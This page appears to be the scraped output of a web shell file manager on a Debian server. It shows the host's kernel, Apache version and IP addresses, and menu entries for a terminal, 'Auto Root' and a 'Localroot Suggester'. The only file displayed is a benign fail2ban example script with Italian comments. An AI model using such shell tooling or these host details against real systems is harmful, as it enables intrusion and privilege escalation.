Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.122
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
fail2ban /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
cacti
[ DIR ]
drwxr-xr-x
2022-11-21 13:38
nagios
[ DIR ]
drwxr-xr-x
2022-11-21 13:38
ipmasq-ZZZzzz_fail2ban.rul
1011
B
-rw-r--r--
2016-12-09 15:48
Save
Rename
#! /bin/sh # # ZZZzzz|fail2ban.rul # # Ultima modifica: 20060112 <Nauta@G-B.it> Creazione # Ultima modifica: 20071205 <Nauta@G-B.it> Verifica sia in esecuzione # # Riconfigura le regole di filtraggio relative a fail2ban alla fine # dell'inizializzazione delle regole. # Solo all'avvio del sistema mostra la (ri)esecuzione dello script _NAME=fail2ban _INITSCRIPT=/etc/init.d/$_NAME _CONFIG="/etc/$_NAME/$_NAME.local /etc/$_NAME/$_NAME.conf" if [ -s $_INITSCRIPT ]; then SOCKFILE=`sed -n -e '/^[^#]*socket\s*=/{ s/.*socket\s*=\s*\(\S\+\).*/\1/p;q}' $_CONFIG 2>/dev/null` [ -z "$SOCKFILE" ] && SOCKFILE="/tmp/$_NAME.sock" if [ -S "$SOCKFILE" ]; then # Is daemon running ? if [ "$SHOWRULES" = "yes" ]; then echo "#: Reinitializing $_NAME" echo $_INITSCRIPT force-reload else [ ! $runlevel ] && HIDEOUTPUT=true fi if [ "$NOACT" != "yes" ]; then eval $_INITSCRIPT force-reload ${HIDEOUTPUT:+\>/dev/null 2\>&1} fi fi # SOCKFILE is a socket fi # _INITSCRIPT exist